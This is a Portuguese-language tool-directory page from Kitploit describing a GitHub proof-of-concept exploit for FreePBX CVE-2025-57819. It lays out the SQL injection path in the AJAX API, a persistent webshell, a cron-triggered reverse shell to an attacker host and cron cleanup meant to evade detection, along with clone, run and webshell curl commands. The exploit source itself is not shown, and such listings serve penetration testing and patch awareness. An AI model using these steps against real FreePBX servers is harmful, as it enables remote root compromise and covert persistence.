Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-5781 — Exploit de prova de conceito para CVE-2025-57819 no FreePBX: injeção de SQL na API AJAX para executar PHP arbitrário, criar um webshell persistente e acionar um reverse shell. | Kitploit
Ferramentas/GitHubGitHub/jasonbernier/cve-2025-5781
Mecanismos de PersistênciaExploraçãoExploração de Aplicações WebPós-ExploraçãoComando e ControleDesenvolvimento de Payloads
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

Exploit de prova de conceito para CVE-2025-57819 no FreePBX: injeção de SQL na API AJAX para executar PHP arbitrário, criar um webshell persistente e acionar um reverse shell.

Ver Repositório
5há 29 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit do FreePBX CVE-2025-57819

Descrição

Este script explora uma vulnerabilidade em versões do FreePBX anteriores à 16.0.26.0 (CVE-2025-57819), permitindo que atacantes remotos executem código PHP arbitrário por meio de uma falha de injeção de SQL no endpoint da API AJAX. O exploit cria tanto um webshell quanto uma reverse shell acionada automaticamente.

Detalhes da Vulnerabilidade

  • CVE: CVE-2025-57819
  • Versões Afetadas: FreePBX < 16.0.26.0
  • Impacto: Execução Remota de Código (RCE)
  • Vetor: Injeção de SQL na API AJAX (/admin/ajax.php)

Características

  • Cria um webshell persistente em /pbxshell.php
  • Configura uma reverse shell acionada automaticamente via cron job
  • Usa payloads codificados em Base64 para contornar filtros
  • Limpeza automática dos cron jobs após a execução

Requisitos

  • Python 3.x
  • Biblioteca requests
  • Netcat (para o listener da reverse shell)
  • Instalação

    root@kitploit:~
    git clone https://github.com/jasonbernier/CVE-2025-5781.git
    cd CVE-2025-5781
    pip install requests
    

    Uso

    root@kitploit:~
    python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
    

    Parâmetros:

    • -H HOST: Instância FreePBX alvo (ex.: https://freepbx.example.com)
    • -lhost LHOST: Seu IP para o callback da reverse shell
    • -lport LPORT: Porta para a conexão da reverse shell

    Exemplo:

    root@kitploit:~
    python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
    

    Fluxo do Exploit

    1. Envia o payload de injeção de SQL para criar um webshell
    2. Aguarda o webshell ser criado (~2 minutos)
    3. Cria uma reverse shell acionada automaticamente via cron job
    4. Inicia um listener netcat na porta especificada

    Uso do Webshell

    Após a exploração bem-sucedida, acesse o webshell via:

    root@kitploit:~
    curl -X GET "http://TARGET/pbxshell.php?cmd=id"
    

    Limpeza

    O exploit remove automaticamente os cron jobs após a execução para evitar detecção.

    Notas

    • O script usa -- para comentar a sintaxe SQL restante
    • Todos os comandos são executados com privilégios de root
    • Requer permissão de escrita no diretório /var/www/html/

    Referências

    • CVE-2025-57819
    • Aviso de Segurança do FreePBX
    Baixar ferramenta